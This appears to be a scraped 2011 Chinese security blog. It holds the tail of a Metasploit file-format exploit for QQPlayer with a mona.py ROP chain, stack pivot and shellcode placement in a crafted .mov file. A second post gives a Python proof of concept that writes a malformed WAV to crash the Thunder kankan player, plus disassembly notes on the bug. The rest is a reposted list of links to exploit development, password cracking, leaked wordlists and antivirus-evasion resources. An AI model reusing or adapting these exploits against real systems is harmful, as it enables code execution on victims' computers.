			0x00418007,	# POP ECX # RETN (QQPlayer.exe)

			0x63d18000,	# RW pointer (lpOldProtect) (-> ecx)

			0x63d05001,	# POP EDI # RETN (avutil-49.dll)

			0x63d05002,	# ROP NOP (-> edi)

			0x008bf00b,	# POP EDX # RETN (QQPlayer.exe)

			0x00000040,	# newProtect (0x40) (-> edx)

			0x00468800,	# POP EAX # RETN (QQPlayer.exe)

			0x90909090,	# NOPS (-> eax)

			0x008bad5c,	# PUSHAD # RETN (QQPlayer.exe)

		# rop chain generated by mona.py

		# note : this chain may not work out of the box

		# you may have to change order or fix some gadgets,

		# but it should give you a head start

		].pack("V*")
		stackpivot = [target.ret].pack('L')
		buffer =rand_text_alpha_upper(90)#2

		buffer << rop_gadgets

		buffer << payload.encoded
		junk = rand_text_alpha_upper(2306 - buffer.length)
		buffer << junk

		buffer << stackpivot

		buffer << rand_text_alpha_upper(3000)#3000
		path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2011-0257.mov" )

		fd = File.open(path, "rb" )

		sploit = fd.read(fd.stat.size)

		fd.close
		sploit << buffer

file_create(sploit) end end

thunder_kankan_stack_overflow/dos exploit

cq — Thu, 17 Nov 2011 14:56:32 +0000

http://cq-cser.cn/wp-content/plugins/downloads-manager/upload/kankan.py

print “”"

#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0

#0 ___ ___ ___ ___ ___ ___ 1

#1 /\__\ /\ \ /\__\ /\__\ /\ \ /\__\ 0

#0 /:/ / /::\ \ /:/ / /:/ / /::\ \ /:/ / 1

#1 /:/__/ /:/\:\ \ /:/ / /:/ / /:/\:\ \ /:/__/ 0

#0 /::\ \ ___ /::\~\:\ \ /:/ / /:/ / /:/ \:\ \ /::\__\____ 1

#1 /:/\:\ /\__\ /:/\:\ \:\__\ /:/__/ /:/__/ /:/__/ \:\__\ /:/\:::::\__\0

#0 \/__\:\/:/ / \:\~\:\ \/__/ \:\ \ \:\ \ \:\ \ /:/ / \/_|:|~~|~ 1

#1 \::/ / \:\ \:\__\ \:\ \ \:\ \ \:\ /:/ / |:| | 0

#0 /:/ / \:\ \/__/ \:\ \ \:\ \ \:\/:/ / |:| | 1

#1 /:/ / \:\__\ \:\__\ \:\__\ \::/ / |:| | 0

#0 \/__/ \/__/ \/__/ \/__/ \/__/ \|__| 1

#1 0

#0 [+] Exploit Title: Thunder kankan player Stack overflow/DOS Exploit 1

#1 [+] Software Link: dl.xunlei.com/xmp.html 0

#0 [+] Software: Thunder kankan player 1

#1 [+] Version : 4.8.3.840(last) 0

#0 [+] Tested On: WIN 7 1

#1 [+] Code by: hellok(warptencq@gmail.com) 0

#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-1

“”"

filepath = “exploit.wav”

f = open(filepath, “wb”)

file = ‘\x52\x49\x46\x46\x62\xb8\x20\x20\x57\x41\x56\x45\x66\x6d\x74\x20′

f.write(file)

f.close()

print “Done..”

主要2出错误，都是没校验直接从文件中读出。
bass_wv.dll中的
seg002:10005C2D ; —————————————————————————
seg002:10005C2D ; 148: clean_junk_part:
seg002:10005C2D ; 149: v17 = malloc(site_malloc_may_error);
seg002:10005C2D
seg002:10005C2D clean_junk_part: ; CODE XREF: seem_important+1BDj
seg002:10005C2D ; seem_important+245j
seg002:10005C2D push esi ; Size
seg002:10005C2E call malloc ; /size = F2471B06 (-230221050.)可控
seg002:10005C34 ; 150: (**(memory1 + 112))(*(memory1 + 116), v17, site_malloc_may_error);// basedll(+116)
seg002:10005C34 mov ecx, [ebp+74h] ; 申请失败，导致EAX==00
seg002:10005C37 add esp, 4
seg002:10005C3A mov edi, eax ; eax==0000 污染源
seg002:10005C3C mov eax, [ebp+70h]
seg002:10005C3F push esi
seg002:10005C40 mov edx, edi
seg002:10005C42 call dword ptr [eax] ; call base.dll!!!!!!!!!!!!!!!!
seg002:10005C42 ; 从文件里读ECX大小内容到刚开辟空间
seg002:10005C44 ; 151: free(v17);
seg002:10005C44 push edi ; Memory
seg002:10005C45 call free
seg002:10005C4B ; 152: strncpy_ = strncmp;
seg002:10005C4B mov edi, strncmp
seg002:10005C51 add esp, 4
seg002:10005C54 jmp loc_10005AF7

另一来自base.dll
seg000:1001083D pop eax
seg000:1001083E ; 100: if ( v66 > 0×12 ) v66可控污染源
seg000:1001083E cmp [ebp+var_10], eax
seg000:10010841 jbe short crash_inside
seg000:10010843 ; 101: v14 = v66;
seg000:10010843 mov eax, [ebp+var_10]
seg000:10010846 ; 102: v15 = v14 + 3;
seg000:10010846
seg000:10010846 crash_inside: ; CODE XREF: crash_here__+242j
seg000:10010846 add eax, 3
seg000:10010849 ; 103: LOBYTE(v15) = v15 & 0xFC;
seg000:10010849 and al, 0FCh
seg000:1001084B ; 104: v16 = alloca(v15);
seg000:1001084B call __alloca_probe
seg000:10010850 ; 105: v4 = &v39;
seg000:10010850 mov ebx, esp
seg000:10010852 ; 106: sub_10001974(v5, &v39, v66);

bass_wv.dll的里面看了半天,想搞个什么use after free,double free什么的,可惜没找到啊,小遗憾啦

Blogs, Feeds, Guides & Links[zz]

cq — Sun, 13 Nov 2011 10:33:15 +0000

原文：http://g0tmi1k.blogspot.com/2011/11/blog-guides-links.html
顺便FK GFW
特别推荐http://j00ru.vexillium.org/?p=893此系列

Programming/Coding
[Bash] Advanced Bash-Scripting Guide – http://tldp.org/LDP/abs/html/
[Bash] Bash shell scripting tutorial – http://steve-parker.org/sh/sh.shtml
[Bash] Bourne Shell Reference – http://linuxreviews.org/beginner/bash_GNU_Bourne-Again_SHell_Reference/
[CheatSheet] Scripting Languages: PHP, Perl, Python, Ruby – http://hyperpolyglot.org/scripting

Offensive Security’s Pentesting With BackTrack (PWB) Course
[Pre-course] Corelan Team – http://www.corelan.be
[Pre-course] The Penetration Testing Execution Standard – http://www.pentest-standard.org/index.php/Main_Page
[Hash] NTLM Decrypter – http://www.md5decrypter.co.uk/ntlm-decrypt.aspx
[Hash] reverse hash search and calculator – http://goog.li

http://security.crudtastic.com/?p=213

Tunnelling / Pivoting
[Linux] SSH gymnastics with proxychains – http://pauldotcom.com/2010/03/ssh-gymnastics-with-proxychain.html
[Windows] Nessus Through SOCKS Through Meterpreter – http://www.digininja.org/blog/nessus_over_sock4a_over_msf.php

WarGames / Online Challenges
[WarGames] Title – http://securityoverride.com
[WarGames] Title – http://intruded.net
[Challenge] The Ksplice Pointer Challenge – http://blogs.oracle.com/ksplice/
[WarGames] Title – http://spotthevuln.com
[WarGames] Title – http://cvo-lab.blogspot.com/2011/05/iawacs-2011-forensics-challenge.html
[WarGames] Title – http://ftp.hackerdom.ru/ctf-images/

Exploit Development (Programs)
[Download] Title – http://www.oldapps.com/
[Download] Title – http://www.oldversion.com/
[Download] Title – http://www.exploit-db.com/webapps/

Misc
[RSS] Open Penetration Testing Bookmarks Collection – https://code.google.com/p/pentest-bookmarks/downloads/list
[ExploitDev] Data mining Backtrack 4 for buffer overflow return addresses – http://insidetrust.blogspot.com/2010/12/data-mining-backtrack-4-for-buffer.html
[DIY] Repair a Broken Ethernet Plug – http://www.instructables.com/id/Repair-a-Broken-Ethernet-Plug/step5/Make-its-Head-Thin/
[Desktop] Ubuntu Security – http://ubuntuforums.org/showthread.php?t=510812
[TechHumor] Title – https://www.xkcd.com
[TechHumor] Title – http://www.blackhat.com/presentations/bh-europe-05/BH_EU_05-Long.pdf

Exploit Development
[Guides] Corelan Team – http://www.corelan.be
[Guide] From 0×90 to 0x4c454554, a journey into exploitation. – http://myne-us.blogspot.com/2010/08/from-0×90-to-0x4c454554-journey-into.html
[Guide] An Introduction to Fuzzing: Using fuzzers (SPIKE) to find vulnerabilities – http://resources.infosecinstitute.com/intro-to-fuzzing/
[Video] TiGa’s Video Tutorial Series on IDA Pro – http://www.woodmann.com/TiGa/idaseries.html
[Guide] Advanced Windows Buffer Overflows – http://labs.snort.org/awbo/
[Guide] Stack Based Windows Buffer Overflow Tutorial – http://grey-corner.blogspot.com/2010/01/beginning-stack-based-buffer-overflow.htmlt
[Guide] SEH Stack Based Windows Buffer Overflow Tutorial – http://grey-corner.blogspot.com/2010/01/seh-stack-based-windows-buffer-overflow.html
[Guide] Windows Buffer Overflow Tutorial: Dealing with Character Translation – http://grey-corner.blogspot.com/2010/01/windows-buffer-overflow-tutorial.html
[Guide] Heap Spray Exploit Tutorial: Internet Explorer Use After Free Aurora Vulnerability< – http://grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html
[Guide] Windows Buffer Overflow Tutorial: An Egghunter and a Conditional Jump – http://grey-corner.blogspot.com/2010/02/windows-buffer-overflow-tutorial.html
[Linux] Linux exploit development part 1 – Stack overflow. – http://sickness.tor.hu/?p=363
[Linux] Linux Exploit Writing Tutorial Pt 2 – Stack Overflow ASLR bypass Using ret2reg – http://sickness.tor.hu/?p=365
[Linux] Linux exploit development part 3 – ret2libc – http://sickness.tor.hu/?p=368
[Linux] Linux exploit development part 4 – ASCII armor bypass + return-to-plt – http://sickness.tor.hu/?p=378
[TechHumor] Title – https://www.youtube.com/watch?v=klXFqtYR5Mg
[TechHumor] Title – http://amolnaik4.blogspot.com/2011/06/exploit-development-with-monapy.html

Exploit Development (Case Studies/Walkthroughs)
[Web] Finding 0days in Web Applications – http://www.exploit-db.com/finding-0days-in-web-applications/
[Windows] Offensive Security Exploit Weekend – http://www.corelan.be/index.php/2010/11/13/offensive-security-exploit-weekend/
[Windows] From vulnerability to exploit under 5 min – http://0entropy.blogspot.com/2011/02/from-vulnerability-to-exploit-under-5.html

Exploit Development (Patch Analysis)
[Windows] A deeper look at ms11-058 – http://www.skullsecurity.org/blog/2011/a-deeper-look-at-ms11-058
[Windows] Patch Analysis for MS11-058 – https://community.qualys.com/blogs/securitylabs/2011/08/23/patch-analysis-for-ms11-058
[Windows] CVE-2011-1281: A story of a Windows CSRSS Privilege Escalation vulnerability – http://j00ru.vexillium.org/?p=893
[Mobile] Analyzing and dissecting Android applications for security defects and vulnerabilities – https://www.net-security.org/article.php?id=1613

Exploit Development (Metasploit Wishlist)
[ExplotDev] Metasploit Exploits Wishlist ! – http://esploit.blogspot.com/2011/03/metasploit-exploits-wishlist.html
[Guide] Porting Exploits To Metasploit Part 1 – http://www.securitytube.net/video/2118

Passwords & Rainbow Tables (WPA)
[RSS] Title – http://ob-security.info/?p=475
[RSS] Title – http://nakedsecurity.sophos.com/2011/06/14/the-top-10-passcodes-you-should-never-use-on-your-iphone/
[RSS] Title – http://www.troyhunt.com/2011/06/brief-sony-password-analysis.html
[WPA] Offensive Security: WPA Rainbow Tables – http://www.offensive-security.com/wpa-tables/
[Tool] Ultra High Security Password Generator – https://www.grc.com/passwords.htm
[Guide] Creating effective dictionaries for password attacks – http://insidetrust.blogspot.com/2010/07/creating-effective-dictionaries-for.html
[Leaked] Diccionarios con Passwords de Sitios Expuestos – http://www.dragonjar.org/diccionarios-con-passwords-de-sitios-expuestos.xhtml
[Download] Index of / – http://svn.isdpodcast.com/wordlists/
[Guide] Using Wikipedia as brute forcing dictionary – http://lab.lonerunners.net/blog/using-wikipedia-as-brute-forcing-dictionary
[Tool] CeWL – Custom Word List generator – http://www.digininja.org/projects/cewl.php
[Download] Title – http://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlists
[Leaked] Passwords – http://www.skullsecurity.org/wiki/index.php/Passwords

Cheat-Sheets
[OS] A Sysadmin’s Unixersal Translator – http://bhami.com/rosetta.html
[WiFi] WirelessDefence.org’s Wireless Penetration Testing Framework – http://www.wirelessdefence.org/Contents/Wireless%20Pen%20Test%20Framework.html

Anti-Virus
[Metasploit] Facts and myths about antivirus evasion with Metasploit – http://schierlm.users.sourceforge.net/avevasion.html
[Terms] Methods of bypassing Anti-Virus (AV) Detection – NetCat – http://compsec.org/security/index.php/anti-virus/283-anti-virus-central-methods-of-bypassing-anti-virus-av-detection.html

Privilege Escalation
[Linux] Hacking Linux Part I: Privilege Escalation – http://www.dankalia.com/tutor/01005/0100501004.htm
[Windows] Windows 7 UAC whitelist – http://www.pretentiousname.com/misc/win7_uac_whitelist2.html
[Windows] Windows Privilege Escalation Part 1: Local Administrator Privileges – http://www.netspi.com/blog/2009/10/05/windows-privilege-escalation-part-1-local-administrator-privileges/

Metasploit
[Guide] fxsst.dll persistence: the evil fax machine – http://www.room362.com/blog/2011/6/27/fxsstdll-persistence-the-evil-fax-machine.html
[Guide] Bypassing DEP/ASLR in browser exploits with McAfee and Symantec – http://www.scriptjunkie.us/2011/08/custom-payloads-in-metasploit-4/
[Guides] Metasploit Unleashed – http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training
[Guides] Metasploit Megaprimer (Exploitation Basics And Need For Metasploit) Part 1 – http://www.securitytube.net/video/1175

Default Generators
[WEP] mac2wepkey – Huawei default WEP generator – http://websec.ca/blog/view/mac2wepkey_huawei
[WEP] Generator: Attacking SKY default router password – http://sec.jetlib.com/BackTrack_Linux_Forums/2011/01/12/Generator:_Attacking_SKY_default_router_password

Statistics
[Defacements] Zone-H – http://www.zone-h.org
[ExploitKits] CVE Exploit Kit list – http://exploitkit.ex.ohost.de/CVE%20Exploit%20Kit%20List.htm

Cross Site Scripting (XSS)
[Guide] vbSEO – From XSS to Reverse PHP Shell – http://www.exploit-db.com/vbseo-from-xss-to-reverse-php-shell/
[RSS] Title – http://www.thespanner.co.uk/2009/03/25/xss-rays/

Podcasts
[Weekly] PaulDotCom – http://pauldotcom.com/podcast/psw.xml
[Monthly] Social-Engineer – http://socialengineer.podbean.com/feed/

Blogs & RSS
[RSS] SecManiac – http://www.secmaniac.com
[Guides] Carnal0wnage & Attack Research – http://carnal0wnage.attackresearch.com
[RSS] Contagio – http://contagiodump.blogspot.com
[News] THN : The Hacker News – http://thehackernews.com
[News] Packet Storm: Full Disclosure Information Security – http://packetstormsecurity.org
[Guides] pentestmonkey | Taking the monkey work out of pentesting – http://pentestmonkey.net
[RSS] Darknet – The Darkside | Ethical Hacking, Penetration Testing & Computer Security – http://www.darknet.org.uk
[RSS] Irongeek – http://www.irongeek.com
[Metasploit] Room 363 – http://www.room362.com
[Guides] Question Defense: Technology Answers For Technology Questions – http://www.question-defense.com/
[Guides] stratmofo’s blog – http://securityjuggernaut.blogspot.com
[Guides] TheInterW3bs – http://theinterw3bs.com

[Guides] consolecowboys – http://console-cowboys.blogspot.com
[Guides] A day with Tape – http://adaywithtape.blogspot.com
[Guides] Cybexin’s Blog – Network Security Blog – http://cybexin.blogspot.com

[RSS] BackTrack Linux – Penetration Testing Distribution – http://www.backtrack-linux.org/feed/
[RSS] Offensive Security – http://www.offensive-security.com/blog/feed/

[RSS] Title – http://www.pentestit.com
[RSS] Title – http://michael-coates.blogspot.com
[RSS] Title – http://blog.0x0e.org
[RSS] Title – http://0×80.org/blog
[RSS] Title – http://archangelamael.shell.tor.hu
[RSS] Title – http://archangelamael.blogspot.com
[RSS] Title – http://www.coresec.org
[RSS] Title – http://noobys-journey.blogspot.com
[RSS] Title – http://www.get-root.com
[RSS] Title – http://www.kislaybhardwaj.com
[RSS] Title – https://community.rapid7.com/community/metasploit/blog
[RSS] Title – http://mimetus.blogspot.com
[RSS] Title – http://hashcrack.blogspot.com
[RSS] Title – https://rephraseit.wordpress.com
[RSS] Title – http://www.exploit-db.com
[RSS] Title – http:/skidspot.blogspot.com
[RSS] Title – http://grey-corner.blogspot.com
[RSS] Title – http://vishnuvalentino.com
[RSS] Title – http://ob-security.info

…. Not enough? Try twitter and/or IRC!